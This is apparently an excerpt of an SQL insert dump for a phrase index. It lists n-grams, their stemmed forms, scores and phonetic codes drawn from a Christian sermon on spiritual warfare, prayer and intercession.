(273757, 'watching a soccer', 'watch a soccer', 0, 1, 1.5667, 'W32526', 1, '*'),
(273758, 'water baptism', 'water baptism', 0, 1, 1.4333, 'W361325', 1, '*'),
(273759, 'water baptism you', 'water baptism you', 0, 1, 1.5667, 'W361325', 1, '*'),
(273760, 'we are his', 'we are his', 0, 1, 1.3333, 'W620', 1, '*'),
(273761, 'we christians', 'we christians', 0, 1, 1.4333, 'W262352', 1, '*'),
(273762, 'we christians have', 'we christians have', 0, 1, 1.6, 'W2623521', 1, '*'),
(273763, 'we drink', 'we drink', 0, 1, 1.2667, 'W3652', 1, '*'),
(273764, 'we drink any', 'we drink any', 0, 1, 1.4, 'W36525', 1, '*'),
(273765, 'we have been', 'we have been', 0, 1, 1.4, 'W150', 1, '*'),
(273766, 'we have many', 'we have many', 0, 1, 1.4, 'W150', 1, '*'),
(273767, 'we shall lay', 'we shall lay', 0, 1, 1.4, 'W240', 1, '*'),
(273768, 'we shall recover', 'we shall recover', 0, 1, 1.5333, 'W246216', 1, '*'),
(273769, 'we shall take', 'we shall take', 0, 1, 1.4333, 'W2432', 1, '*'),
(273770, 'we should baptize', 'we should baptize', 0, 1, 1.5667, 'W243132', 1, '*'),
(273771, 'we speak', 'we speak', 0, 1, 1.2667, 'W212', 1, '*'),
(273772, 'we speak in', 'we speak in', 0, 1, 1.3667, 'W2125', 1, '*'),
(273773, 'weaponry', 'weaponri', 0, 0, 0.5333, 'W156', 1, '*'),
(273774, 'weaponry and', 'weaponri and', 0, 1, 1.4, 'W15653', 1, '*'),
(273775, 'weaponry and kill', 'weaponri and kill', 0, 1, 1.5667, 'W1565324', 1, '*'),
(273776, 'well you understand', 'well you understand', 0, 1, 1.6333, 'W45362353', 1, '*'),
(273777, 'wert', 'wert', 0, 0, 0.2667, 'W630', 1, '*'),
(273778, 'wert cold', 'wert cold', 0, 1, 1.3, 'W63243', 1, '*'),
(273779, 'wert cold or', 'wert cold or', 0, 1, 1.4, 'W632436', 1, '*'),
(273780, 'what happens when', 'what happens when', 0, 1, 1.5667, 'W31525', 1, '*'),
(273781, 'what\'s', 'what', 0, 0, 0.4, 'W320', 1, '*'),
(273782, 'what\'s happening', 'what happening', 0, 1, 1.5333, 'W32152', 1, '*'),
(273783, 'what\'s happening in', 'what happening in', 0, 1, 1.6333, 'W321525', 1, '*'),
(273784, 'when we', 'when we', 0, 1, 1.2333, 'W500', 2, '*'),
(273785, 'when we speak', 'when we speak', 0, 1, 1.4333, 'W5212', 1, '*'),
(273786, 'when you move', 'when you move', 0, 1, 1.4333, 'W510', 1, '*'),
(273787, 'when you understand', 'when you understand', 0, 1, 1.6333, 'W5362353', 1, '*'),
(273788, 'where they can', 'where they can', 0, 1, 1.4667, 'W6325', 1, '*'),
(273789, 'which is to', 'which is to', 0, 1, 1.3667, 'W230', 1, '*'),
(273790, 'who are too', 'who are too', 0, 1, 1.3667, 'W630', 1, '*'),
(273791, 'who can spend', 'who can spend', 0, 1, 1.4333, 'W252153', 1, '*'),
(273792, 'why they', 'why they', 0, 1, 1.2667, 'W300', 1, '*'),
(273793, 'why they are', 'why they are', 0, 1, 1.4, 'W360', 1, '*'),
(273794, 'why you do', 'why you do', 0, 1, 1.3333, 'W300', 1, '*'),
(273795, 'widespread', 'widespread', 0, 0, 0.6667, 'W32163', 1, '*'),
(273796, 'widespread ignorance', 'widespread ignorance', 0, 1, 1.6667, 'W3216325652', 1, '*'),
(273797, 'widespread ignorance in', 'widespread ignorance in', 0, 1, 1.7667, 'W32163256525', 1, '*'),
(273798, 'will cast', 'will cast', 0, 1, 1.3, 'W423', 1, '*'),
(273799, 'will cast him', 'will cast him', 0, 1, 1.4333, 'W4235', 1, '*'),
(273800, 'with and', 'with and', 0, 1, 1.2667, 'W353', 1, '*'),
(273801, 'with and driven', 'with and driven', 0, 1, 1.5, 'W353615', 1, '*'),
(273802, 'with god majority', 'with god majority', 0, 1, 1.5667, 'W3235263', 1, '*'),
(273803, 'with god most', 'with god most', 0, 1, 1.4333, 'W323523', 1, '*'),
(273804, 'with many', 'with many', 0, 1, 1.3, 'W350', 1, '*'),
(273805, 'with many a', 'with many a', 0, 1, 1.3667, 'W350', 1, '*'),
(273806, 'without faith', 'without faith', 0, 1, 1.4333, 'W313', 1, '*'),
(273807, 'without faith that', 'without faith that', 0, 1, 1.6, 'W313', 1, '*'),
(273808, 'without knowing', 'without knowing', 0, 1, 1.5, 'W3252', 1, '*'),
(273809, 'without knowing most', 'without knowing most', 0, 1, 1.6667, 'W3252523', 1, '*'),
(273810, 'without negotiation', 'without negotiation', 0, 1, 1.6333, 'W35235', 1, '*'),
(273811, 'without negotiation you', 'without negotiation you', 0, 1, 1.7667, 'W35235', 1, '*'),
(273812, 'word level', 'word level', 0, 1, 1.3333, 'W63414', 1, '*'),
(273813, 'word level faith', 'word level faith', 0, 1, 1.5333, 'W6341413', 1, '*'),
(273814, 'work in', 'work in', 0, 1, 1.2333, 'W625', 2, '*'),
(273815, 'work in mark', 'work in mark', 0, 1, 1.4, 'W62562', 1, '*'),
(273816, 'work through', 'work through', 0, 1, 1.4, 'W62362', 1, '*'),
(273817, 'work through you', 'work through you', 0, 1, 1.5333, 'W62362', 1, '*'),
(273818, 'works that thou', 'work that thou', 0, 1, 1.5, 'W623', 1, '*'),
(273819, 'world people', 'world people', 0, 1, 1.4, 'W64314', 1, '*'),
(273820, 'world people are', 'world people are', 0, 1, 1.5333, 'W643146', 1, '*'),
(273821, 'world such', 'world such', 0, 1, 1.3333, 'W6432', 1, '*'),
(273822, 'world such as', 'world such as', 0, 1, 1.4333, 'W6432', 1, '*'),
(273823, 'worldly to', 'worldli to', 0, 1, 1.3333, 'W64343', 1, '*'),
(273824, 'worldly to be', 'worldli to be', 0, 1, 1.4333, 'W643431', 1, '*'),
(273825, 'would in', 'would in', 0, 1, 1.2667, 'W435', 1, '*'),
(273826, 'would in church', 'would in church', 0, 1, 1.5, 'W435262', 1, '*'),
(273827, 'would thou', 'would thou', 0, 1, 1.3333, 'W430', 1, '*'),
(273828, 'would thou wert', 'would thou wert', 0, 1, 1.5, 'W4363', 1, '*'),
(273829, 'you anymore', 'you anymore', 0, 1, 1.3667, 'Y560', 1, '*'),
(273830, 'you anymore here', 'you anymore here', 0, 1, 1.5333, 'Y560', 1, '*'),
(273831, 'you at loggerheads', 'you at loggerheads', 0, 1, 1.6, 'Y342632', 1, '*'),
(273832, 'you do so', 'you do so', 0, 1, 1.3, 'Y320', 1, '*'),
(273833, 'you don\'t believe', 'you don believe', 0, 1, 1.5667, 'Y353141', 1, '*'),
(273834, 'you knowing', 'you knowing', 0, 1, 1.3667, 'Y252', 1, '*'),
(273835, 'you knowing how', 'you knowing how', 0, 1, 1.5, 'Y252', 1, '*'),
(273836, 'you move into', 'you move into', 0, 1, 1.4333, 'Y5153', 1, '*'),
(273837, 'you must develop', 'you must develop', 0, 1, 1.5333, 'Y523141', 2, '*'),
(273838, 'you understand', 'you understand', 0, 1, 1.4667, 'Y5362353', 1, '*'),
(273839, 'you understand the', 'you understand the', 0, 1, 1.6, 'Y5362353', 1, '*'),
(273840, 'you understand what\'s', 'you understand what', 0, 1, 1.7, 'Y53623532', 1, '*'),
(273841, 'you will cast', 'you will cast', 0, 1, 1.4333, 'Y423', 1, '*'),
(273842, 'you\'re there', 'you there', 0, 1, 1.4, 'Y636', 1, '*'),
(273843, 'you\'re there to', 'you there to', 0, 1, 1.5, 'Y6363', 1, '*'),
(273844, 'your bible', 'your bible', 0, 1, 1.3333, 'Y614', 1, '*'),
(273845, 'your bible study', 'your bible study', 0, 1, 1.5333, 'Y61423', 1, '*'),
(273846, 'your failure', 'your failure', 0, 1, 1.4, 'Y6146', 1, '*'),
(273847, 'your failure is', 'your failure is', 0, 1, 1.5, 'Y61462', 1, '*'),
(273848, 'your faith in', 'your faith in', 0, 1, 1.4333, 'Y6135', 1, '*'),
(273849, 'your first duty', 'your first duty', 0, 1, 1.5, 'Y61623', 1, '*'),
(273850, 'your generation', 'your generation', 0, 1, 1.5, 'Y625635', 1, '*'),
(273851, 'your generation when', 'your generation when', 0, 1, 1.6667, 'Y625635', 1, '*'),
(273852, 'your pastor your', 'your pastor your', 0, 1, 1.5333, 'Y61236', 1, '*'),
(273853, 'yourcore', 'yourcor', 0, 0, 0.5333, 'Y626', 1, '*'),
(273854, 'yourcore assignment', 'yourcor assignment', 0, 1, 1.6333, 'Y626253', 1, '*'),
(273855, 'yourcore assignment in', 'yourcor assignment in', 0, 1, 1.7333, 'Y6262535', 1, '*'),
(273856, 'yourself to a', 'yourself to a', 0, 1, 1.4333, 'Y62413', 1, '*'),
(274501, '\'intercessory', 'intercessori', 0, 0, 0.8667, 'I53626', 1, '*'),
(274502, '\'intercessory muscles\'', 'intercessori muscles', 0, 1, 1.7333, 'I536265242', 1, '*'),
(274503, '\'intercessory muscles\' develop', 'intercessori muscles develop', 0, 1, 2, 'I5362652423141', 1, '*'),
(274504, '1-2 last', '1-2 last', 0, 1, 1.2667, 'L230', 1, '*'),
(274505, '1-2 last week', '1-2 last week', 0, 1, 1.4333, 'L232', 1, '*'),
(274506, '1.you', '1.you', 0, 0, 0.3333, 'Y000', 1, '*'),
(274507, '1.you are', '1.you are', 0, 1, 1.3, 'Y600', 1, '*'),
(274508, '1.you are to', '1.you are to', 0, 1, 1.4, 'Y630', 1, '*'),
(274509, '10 17', '10 17', 0, 1, 1.1667, '', 1, '*'),
(274510, '10 17 5', '10 17 5', 0, 1, 1.2333, '', 1, '*'),
(274511, '10-18', '10-18', 0, 0, 0.5, '', 1, '*'),
(274512, '10-18 we', '10-18 we', 0, 1, 1.2667, 'W000', 1, '*'),
(274513, '10-18 we are', '10-18 we are', 0, 1, 1.4, 'W600', 1, '*'),
(274514, '11 3', '11 3', 0, 1, 1.1333, '', 1, '*'),
(274515, '11 3 romans', '11 3 romans', 0, 1, 1.3667, 'R520', 1, '*'),
(274516, '12 1-2 last', '12 1-2 last', 0, 1, 1.3667, 'L230', 1, '*'),
(274517, '14-15 in', '14-15 in', 0, 1, 1.2667, 'I500', 1, '*'),
(274518, '14-15 in the', '14-15 in the', 0, 1, 1.4, 'I530', 1, '*'),
(274519, '15-18 this', '15-18 this', 0, 1, 1.3333, 'T200', 1, '*'),
(274520, '15-18 this point', '15-18 this point', 0, 1, 1.5333, 'T2153', 1, '*'),
(274521, '16 15-18 this', '16 15-18 this', 0, 1, 1.4333, 'T200', 1, '*'),
(274522, '17 5', '17 5', 0, 1, 1.1333, '', 1, '*'),
(274523, '17 5 14-15', '17 5 14-15', 0, 1, 1.3333, '', 1, '*'),
(274524, '18 no', '18 no', 0, 1, 1.1667, 'N000', 1, '*'),
(274525, '18 no matter', '18 no matter', 0, 1, 1.4, 'N360', 1, '*'),
(274526, '2 7', '2 7', 0, 1, 1.1, '', 1, '*'),
(274527, '2 7 says', '2 7 says', 0, 1, 1.2667, 'S000', 1, '*'),
(274528, '2.you', '2.you', 0, 0, 0.3333, 'Y000', 1, '*'),
(274529, '2.you are', '2.you are', 0, 1, 1.3, 'Y600', 1, '*'),
(274530, '2.you are to', '2.you are to', 0, 1, 1.4, 'Y630', 1, '*'),
(274531, '22 correct', '22 correct', 0, 1, 1.3333, 'C623', 1, '*'),
(274532, '23 23', '23 23', 0, 1, 1.1667, '', 1, '*'),
(274533, '23 23 buythe', '23 23 buythe', 0, 1, 1.4, 'B300', 1, '*'),
(274534, '23 buythe', '23 buythe', 0, 1, 1.3, 'B300', 1, '*'),
(274535, '23 buythe truth', '23 buythe truth', 0, 1, 1.5, 'B363', 1, '*'),
(274536, '3 are', '3 are', 0, 1, 1.1667, 'A600', 1, '*'),
(274537, '3 are to', '3 are to', 0, 1, 1.2667, 'A630', 1, '*'),
(274538, '3 romans', '3 romans', 0, 1, 1.2667, 'R520', 1, '*'),
(274539, '3 romans 10', '3 romans 10', 0, 1, 1.3667, 'R520', 1, '*'),
(274540, '4 youare', '4 youare', 0, 1, 1.2667, 'Y600', 1, '*'),
(274541, '4 youare to', '4 youare to', 0, 1, 1.3667, 'Y630', 1, '*'),
(274542, '5 14-15', '5 14-15', 0, 1, 1.2333, '', 1, '*'),
(274543, '5 14-15 in', '5 14-15 in', 0, 1, 1.3333, 'I500', 1, '*'),
(274544, '5 you', '5 you', 0, 1, 1.1667, 'Y000', 1, '*'),
(274545, '5 you are', '5 you are', 0, 1, 1.3, 'Y600', 1, '*'),
(274546, '6 10-18', '6 10-18', 0, 1, 1.2333, '', 1, '*'),
(274547, '6 10-18 we', '6 10-18 we', 0, 1, 1.3333, 'W000', 1, '*'),
(274548, '6 18', '6 18', 0, 1, 1.1333, '', 1, '*'),
(274549, '6 18 no', '6 18 no', 0, 1, 1.2333, 'N000', 1, '*'),
(274550, '6 about', '6 about', 0, 1, 1.2333, 'A130', 1, '*'),
(274551, '6 about warfare', '6 about warfare', 0, 1, 1.5, 'A13616', 1, '*'),
(274552, '6 you are', '6 you are', 0, 1, 1.3, 'Y600', 1, '*'),
(274553, '7 says', '7 says', 0, 1, 1.2, 'S000', 1, '*'),
(274554, '7 says behold', '7 says behold', 0, 1, 1.4333, 'S143', 1, '*'),
(274555, 'a battlefield', 'a battlefield', 0, 1, 1.4333, 'A134143', 1, '*'),
(274556, 'a battlefield unaware', 'a battlefield unaware', 0, 1, 1.7, 'A13414356', 1, '*'),
(274557, 'a capacity', 'a capacity', 0, 1, 1.3333, 'A2123', 1, '*'),
(274558, 'a capacity somewhere', 'a capacity somewhere', 0, 1, 1.6667, 'A2123256', 1, '*'),
(274559, 'a car', 'a car', 0, 1, 1.1667, 'A260', 1, '*'),
(274560, 'a car so', 'a car so', 0, 1, 1.2667, 'A262', 1, '*'),
(274561, 'a christian it', 'a christian it', 0, 1, 1.4667, 'A262353', 1, '*'),
(274562, 'a christian who', 'a christian who', 0, 1, 1.5, 'A26235', 1, '*'),
(274563, 'a degree', 'a degree', 0, 1, 1.2667, 'A326', 1, '*'),
(274564, 'a degree you', 'a degree you', 0, 1, 1.4, 'A326', 1, '*'),
(274565, 'a good intercessor', 'a good intercessor', 0, 1, 1.6, 'A2353626', 1, '*'),
(274566, 'a human', 'a human', 0, 1, 1.2333, 'A500', 2, '*'),
(274567, 'a human being', 'a human being', 0, 1, 1.4333, 'A5152', 1, '*'),
(274568, 'a leader', 'a leader', 0, 1, 1.2667, 'A436', 2, '*'),
(274569, 'a leader no', 'a leader no', 0, 1, 1.3667, 'A4365', 1, '*'),
(274570, 'a little further', 'a little further', 0, 1, 1.5333, 'A4341636', 1, '*'),
(274571, 'a long time', 'a long time', 0, 1, 1.3667, 'A45235', 1, '*'),
(274572, 'a loved', 'a loved', 0, 1, 1.2333, 'A413', 1, '*'),
(274573, 'a loved one', 'a loved one', 0, 1, 1.3667, 'A4135', 1, '*'),
(274574, 'a man woman', 'a man woman', 0, 1, 1.3667, 'A500', 1, '*'),
(274575, 'a minister of', 'a minister of', 0, 1, 1.4333, 'A52361', 1, '*'),
(274576, 'a minster', 'a minster', 0, 1, 1.3, 'A5236', 1, '*'),
(274577, 'a minster of', 'a minster of', 0, 1, 1.4, 'A52361', 1, '*'),
(274578, 'a pastor but', 'a pastor but', 0, 1, 1.4, 'A123613', 1, '*'),
(274579, 'a plan', 'a plan', 0, 1, 1.2, 'A145', 1, '*'),
(274580, 'a plan to', 'a plan to', 0, 1, 1.3, 'A1453', 1, '*'),
(274581, 'a scholar', 'a scholar', 0, 1, 1.3, 'A246', 1, '*'),
(274582, 'a scholar you', 'a scholar you', 0, 1, 1.4333, 'A246', 1, '*'),
(274583, 'a soldier ephesians', 'a soldier ephesians', 0, 1, 1.6333, 'A24361252', 1, '*'),
(274584, 'a soldier is', 'a soldier is', 0, 1, 1.4, 'A24362', 1, '*'),
(274585, 'a sunday', 'a sunday', 0, 1, 1.2667, 'A253', 1, '*'),
(274586, 'a sunday fashion', 'a sunday fashion', 0, 1, 1.5333, 'A253125', 1, '*'),
(274587, 'a thermometer', 'a thermometer', 0, 1, 1.4333, 'A36536', 1, '*'),
(274588, 'a thermometer christian', 'a thermometer christian', 0, 1, 1.7667, 'A3653626235', 1, '*'),
(274589, 'a thermostat', 'a thermostat', 0, 1, 1.4, 'A36523', 1, '*'),
(274590, 'a thermostat christian', 'a thermostat christian', 0, 1, 1.7333, 'A3652326235', 1, '*'),
(274591, 'ability as', 'abil as', 0, 1, 1.3333, 'A1432', 1, '*'),
(274592, 'ability as a', 'abil as a', 0, 1, 1.4, 'A1432', 1, '*'),
(274593, 'able to pray', 'abl to pray', 0, 1, 1.4, 'A14316', 1, '*'),
(274594, 'able to withstand', 'abl to withstand', 0, 1, 1.5667, 'A1432353', 1, '*'),
(274595, 'abounds', 'abound', 0, 0, 0.4667, 'A1532', 1, '*'),
(274596, 'abounds in', 'abound in', 0, 1, 1.3333, 'A15325', 1, '*'),
(274597, 'abounds in those', 'abound in those', 0, 1, 1.5333, 'A1532532', 1, '*'),
(274598, 'about warfare', 'about warfare', 0, 1, 1.4333, 'A13616', 1, '*'),
(274599, 'about warfare the', 'about warfare the', 0, 1, 1.5667, 'A136163', 1, '*'),
(274600, 'above scripture are', 'abov scripture are', 0, 1, 1.6333, 'A126136', 1, '*'),
(274601, 'accept god\'s', 'accept god', 0, 1, 1.4, 'A213232', 1, '*'),
(274602, 'accept god\'s word', 'accept god word', 0, 1, 1.5667, 'A21323263', 1, '*'),
(274603, 'acquire', 'acquir', 0, 0, 0.4667, 'A260', 2, '*'),
(274604, 'acquire and', 'acquir and', 0, 1, 1.3667, 'A2653', 1, '*'),
(274605, 'acquire and develop', 'acquir and develop', 0, 1, 1.6333, 'A2653141', 1, '*'),
(274606, 'active warfare', 'activ warfare', 0, 1, 1.4667, 'A231616', 1, '*'),
(274607, 'active warfare against', 'activ warfare against', 0, 1, 1.7333, 'A2316162523', 1, '*'),
(274608, 'actively seek', 'activ seek', 0, 1, 1.4333, 'A23142', 1, '*'),
(274609, 'actively seek divine', 'activ seek divine', 0, 1, 1.6667, 'A23142315', 1, '*'),
(274610, 'actively seek truth', 'activ seek truth', 0, 1, 1.6333, 'A23142363', 1, '*'),
(274611, 'activities 2.you', 'activ 2.you', 0, 1, 1.5333, 'A23132', 1, '*'),
(274612, 'activities 2.you are', 'activ 2.you are', 0, 1, 1.6667, 'A231326', 1, '*'),
(274613, 'against principalities', 'against principalities', 0, 1, 1.7333, 'A252316521432', 1, '*'),
(274614, 'against principalities and', 'against principalities and', 0, 1, 1.8667, 'A25231652143253', 1, '*'),
(274615, 'against the devil', 'against the devil', 0, 1, 1.5667, 'A252314', 1, '*'),
(274616, 'against the wiles', 'against the wiles', 0, 1, 1.5667, 'A252342', 1, '*'),
(274617, 'all hell', 'all hell', 0, 1, 1.2667, 'A400', 1, '*'),
(274618, 'all hell just', 'all hell just', 0, 1, 1.4333, 'A423', 1, '*'),
(274619, 'all these things', 'all these things', 0, 1, 1.5333, 'A432352', 1, '*'),
(274620, 'all you do', 'all you do', 0, 1, 1.3333, 'A430', 1, '*'),
(274621, 'all your sermon', 'all your sermon', 0, 1, 1.5, 'A46265', 1, '*'),
(274622, 'already available', 'alreadi available', 0, 1, 1.5667, 'A4631414', 1, '*'),
(274623, 'already available for', 'alreadi available for', 0, 1, 1.7, 'A463141416', 1, '*'),
(274624, 'already said', 'alreadi said', 0, 1, 1.4, 'A46323', 1, '*'),
(274625, 'already said in', 'alreadi said in', 0, 1, 1.5, 'A463235', 1, '*'),
(274626, 'also to', 'also to', 0, 1, 1.2333, 'A423', 1, '*'),
(274627, 'also to develop', 'also to develop', 0, 1, 1.5, 'A423141', 1, '*'),
(274628, 'also wisdom', 'also wisdom', 0, 1, 1.3667, 'A4235', 1, '*'),
(274629, 'also wisdom and', 'also wisdom and', 0, 1, 1.5, 'A42353', 1, '*'),
(274630, 'always prayer', 'alwai prayer', 0, 1, 1.4333, 'A4216', 1, '*'),
(274631, 'always prayer is', 'alwai prayer is', 0, 1, 1.5333, 'A42162', 1, '*'),
(274632, 'an active', 'an active', 0, 1, 1.3, 'A5231', 1, '*'),
(274633, 'an active warfare', 'an active warfare', 0, 1, 1.5667, 'A5231616', 1, '*'),
(274634, 'an animal', 'an animal', 0, 1, 1.3, 'A540', 1, '*'),
(274635, 'an animal another', 'an animal another', 0, 1, 1.5667, 'A54536', 1, '*'),
(274636, 'an evil', 'an evil', 0, 1, 1.2333, 'A514', 1, '*'),
(274637, 'an evil day', 'an evil day', 0, 1, 1.3667, 'A5143', 1, '*'),
(274638, 'an intercessor', 'an intercessor', 0, 1, 1.4667, 'A53626', 1, '*'),
(274639, 'an intercessor ephesians', 'an intercessor ephesians', 0, 1, 1.8, 'A536261252', 1, '*'),
(274640, 'an urgent', 'an urgent', 0, 1, 1.3, 'A56253', 1, '*'),
(274641, 'an urgent need', 'an urgent need', 0, 1, 1.4667, 'A5625353', 1, '*'),
(274642, 'and can use', 'and can use', 0, 1, 1.3667, 'A53252', 1, '*'),
(274643, 'and claim', 'and claim', 0, 1, 1.3, 'A53245', 1, '*'),
(274644, 'and claim it', 'and claim it', 0, 1, 1.4, 'A532453', 1, '*'),
(274645, 'and develop', 'and develop', 0, 1, 1.3667, 'A53141', 1, '*'),
(274646, 'and develop our', 'and develop our', 0, 1, 1.5, 'A531416', 1, '*'),
(274647, 'and directly', 'and directly', 0, 1, 1.4, 'A536234', 1, '*'),
(274648, 'and directly to', 'and directly to', 0, 1, 1.5, 'A5362343', 1, '*'),
(274649, 'and drive', 'and drive', 0, 1, 1.3, 'A5361', 1, '*'),
(274650, 'and drive a', 'and drive a', 0, 1, 1.3667, 'A5361', 1, '*'),
(274651, 'and god\'s word', 'and god word', 0, 1, 1.4667, 'A5323263', 1, '*'),
(274652, 'and his cohorts', 'and his cohorts', 0, 1, 1.5, 'A532632', 1, '*'),
(274653, 'and in doing', 'and in doing', 0, 1, 1.4, 'A535352', 1, '*'),
(274654, 'and instruction', 'and instruction', 0, 1, 1.5, 'A535236235', 1, '*'),
(274655, 'and instruction and', 'and instruction and', 0, 1, 1.6333, 'A5352362353', 1, '*'),
(274656, 'and it\'s', 'and it', 0, 1, 1.2667, 'A532', 1, '*'),
(274657, 'and it\'s extremely', 'and it extremely', 0, 1, 1.6, 'A5323654', 1, '*'),
(274658, 'and men of', 'and men of', 0, 1, 1.3333, 'A5351', 2, '*'),
(274659, 'and mixtures there', 'and mixtures there', 0, 1, 1.6, 'A535236236', 1, '*'),
(274660, 'and nourish', 'and nourish', 0, 1, 1.3667, 'A53562', 1, '*'),
(274661, 'and nourish your', 'and nourish your', 0, 1, 1.5333, 'A535626', 1, '*'),
(274662, 'and now have', 'and now have', 0, 1, 1.4, 'A5351', 1, '*'),
(274663, 'and powers', 'and powers', 0, 1, 1.3333, 'A53162', 1, '*'),
(274664, 'and powers not', 'and powers not', 0, 1, 1.4667, 'A5316253', 1, '*'),
(274665, 'and refresh', 'and refresh', 0, 1, 1.3667, 'A536162', 1, '*'),
(274666, 'and refresh your', 'and refresh your', 0, 1, 1.5333, 'A5361626', 1, '*'),
(274667, 'and sellit', 'and sellit', 0, 1, 1.3333, 'A53243', 1, '*'),
(274668, 'and sellit not', 'and sellit not', 0, 1, 1.4667, 'A5324353', 1, '*'),
(274669, 'and sensitivity', 'and sensitivity', 0, 1, 1.5, 'A53252313', 1, '*'),
(274670, 'and sensitivity to', 'and sensitivity to', 0, 1, 1.6, 'A53252313', 1, '*'),
(274671, 'and sometime', 'and sometime', 0, 1, 1.4, 'A532535', 1, '*'),
(274672, 'and sometime to', 'and sometime to', 0, 1, 1.5, 'A5325353', 1, '*'),
(274673, 'and spends', 'and spends', 0, 1, 1.3333, 'A5321532', 1, '*'),
(274674, 'and spends his', 'and spends his', 0, 1, 1.4667, 'A5321532', 1, '*'),
(274675, 'and spirit', 'and spirit', 0, 1, 1.3333, 'A532163', 1, '*'),
(274676, 'and spirit with', 'and spirit with', 0, 1, 1.5, 'A532163', 1, '*'),
(274677, 'and stop', 'and stop', 0, 1, 1.2667, 'A53231', 1, '*'),
(274678, 'and stop creating', 'and stop creating', 0, 1, 1.5667, 'A5323126352', 1, '*'),
(274679, 'and straightforward', 'and straightforward', 0, 1, 1.6333, 'A5323623163', 1, '*'),
(274680, 'and straightforward take', 'and straightforward take', 0, 1, 1.8, 'A53236231632', 1, '*'),
(274681, 'and the less', 'and the less', 0, 1, 1.4, 'A5342', 1, '*'),
(274682, 'and the only', 'and the only', 0, 1, 1.4, 'A5354', 1, '*'),
(274683, 'and the worst', 'and the worst', 0, 1, 1.4333, 'A53623', 1, '*'),
(274684, 'and those who', 'and those who', 0, 1, 1.4333, 'A532', 1, '*'),
(274685, 'and understanding', 'and understanding', 0, 1, 1.5667, 'A53536235352', 1, '*'),
(274686, 'and understanding one', 'and understanding one', 0, 1, 1.7, 'A535362353525', 1, '*'),
(274687, 'and understanding the', 'and understanding the', 0, 1, 1.7, 'A535362353523', 1, '*'),
(274688, 'and understanding you', 'and understanding you', 0, 1, 1.7, 'A53536235352', 1, '*'),
(274689, 'and unprepared', 'and unprepared', 0, 1, 1.4667, 'A53516163', 1, '*'),
(274690, 'and unprepared for', 'and unprepared for', 0, 1, 1.6, 'A5351616316', 1, '*'),
(274691, 'and wants', 'and wants', 0, 1, 1.3, 'A53532', 1, '*'),
(274692, 'and wants to', 'and wants to', 0, 1, 1.4, 'A535323', 1, '*'),
(274693, 'and when god', 'and when god', 0, 1, 1.4, 'A53523', 1, '*'),
(274694, 'and you really', 'and you really', 0, 1, 1.4667, 'A5364', 1, '*'),
(274695, 'and your duties', 'and your duties', 0, 1, 1.5, 'A53632', 1, '*'),
(274696, 'animal', 'anim', 0, 0, 0.4, 'A540', 1, '*'),
(274697, 'animal another', 'anim another', 0, 1, 1.4667, 'A54536', 1, '*'),
(274698, 'animal another reason', 'anim another reason', 0, 1, 1.7, 'A5453625', 1, '*'),
(274699, 'another reason', 'anoth reason', 0, 1, 1.4667, 'A53625', 1, '*'),
(274700, 'another reason we', 'anoth reason we', 0, 1, 1.5667, 'A53625', 1, '*'),
(274701, 'any assignment', 'ani assignment', 0, 1, 1.4667, 'A5253', 1, '*'),
(274702, 'any assignment given', 'ani assignment given', 0, 1, 1.6667, 'A5253215', 1, '*'),
(274703, 'approach a', 'approach a', 0, 1, 1.3333, 'A162', 1, '*'),
(274704, 'approach a battlefield', 'approach a battlefield', 0, 1, 1.7333, 'A162134143', 1, '*'),
(274705, 'are at', 'ar at', 0, 1, 1.2, 'A630', 1, '*'),
(274706, 'are at war', 'ar at war', 0, 1, 1.3333, 'A636', 1, '*'),
(274707, 'are in leadership', 'ar in leadership', 0, 1, 1.5667, 'A6543621', 1, '*'),
(274708, 'are let', 'ar let', 0, 1, 1.2333, 'A643', 1, '*'),
(274709, 'are let us', 'ar let us', 0, 1, 1.3333, 'A6432', 1, '*'),
(274710, 'are many roles', 'ar many roles', 0, 1, 1.4667, 'A65642', 1, '*'),
(274711, 'are those who', 'ar those who', 0, 1, 1.4333, 'A632', 1, '*'),
(274712, 'are to represent', 'ar to represent', 0, 1, 1.5333, 'A63616253', 1, '*'),
(274713, 'are you a', 'ar you a', 0, 1, 1.3, 'A600', 1, '*'),
(274714, 'are you need', 'ar you need', 0, 1, 1.4, 'A653', 1, '*'),
(274715, 'arm yourself', 'arm yourself', 0, 1, 1.4, 'A656241', 1, '*'),
(274716, 'arm yourself with', 'arm yourself with', 0, 1, 1.5667, 'A6562413', 1, '*'),
(274717, 'around you ask', 'around you ask', 0, 1, 1.4667, 'A6532', 1, '*'),
(274718, 'art of', 'art of', 0, 1, 1.2, 'A631', 1, '*'),
(274719, 'art of taking', 'art of taking', 0, 1, 1.4333, 'A6313252', 1, '*'),
(274720, 'as a soldier', 'as a soldier', 0, 1, 1.4, 'A2436', 1, '*'),
(274721, 'as christian', 'as christian', 0, 1, 1.4, 'A26235', 1, '*'),
(274722, 'as christian tapes', 'as christian tapes', 0, 1, 1.6, 'A26235312', 1, '*'),
(274723, 'as christians and', 'as christians and', 0, 1, 1.5667, 'A26235253', 1, '*'),
(274724, 'as christians are', 'as christians are', 0, 1, 1.5667, 'A2623526', 1, '*'),
(274725, 'as christians god', 'as christians god', 0, 1, 1.5667, 'A2623523', 1, '*'),
(274726, 'as christians it', 'as christians it', 0, 1, 1.5333, 'A2623523', 1, '*'),
(274727, 'as men', 'as men', 0, 1, 1.2, 'A250', 1, '*'),
(274728, 'as men of', 'as men of', 0, 1, 1.3, 'A251', 1, '*'),
(274729, 'as we\'ve', 'as we', 0, 1, 1.2667, 'A210', 1, '*'),
(274730, 'as we\'ve seen', 'as we seen', 0, 1, 1.4333, 'A2125', 1, '*'),
(274731, 'ask you this', 'ask you this', 0, 1, 1.4, 'A232', 1, '*'),
(274732, 'ask yourself this', 'ask yourself this', 0, 1, 1.5667, 'A2624132', 1, '*'),
(274733, 'assignment given', 'assign given', 0, 1, 1.5333, 'A253215', 1, '*'),
(274734, 'assignment given to', 'assign given to', 0, 1, 1.6333, 'A2532153', 1, '*'),
(274735, 'at church', 'at church', 0, 1, 1.3, 'A3262', 1, '*'),
(274736, 'at church or', 'at church or', 0, 1, 1.4, 'A32626', 1, '*'),
(274737, 'at how to', 'at how to', 0, 1, 1.3, 'A300', 1, '*'),
(274738, 'at the roles', 'at the roles', 0, 1, 1.4, 'A3642', 1, '*'),
(274739, 'at war', 'at war', 0, 1, 1.2, 'A360', 1, '*'),
(274740, 'at war christianity', 'at war christianity', 0, 1, 1.6333, 'A36262353', 1, '*'),
(274741, 'at what paul', 'at what paul', 0, 1, 1.4, 'A314', 1, '*'),
(274742, 'at your place', 'at your place', 0, 1, 1.4333, 'A36142', 1, '*'),
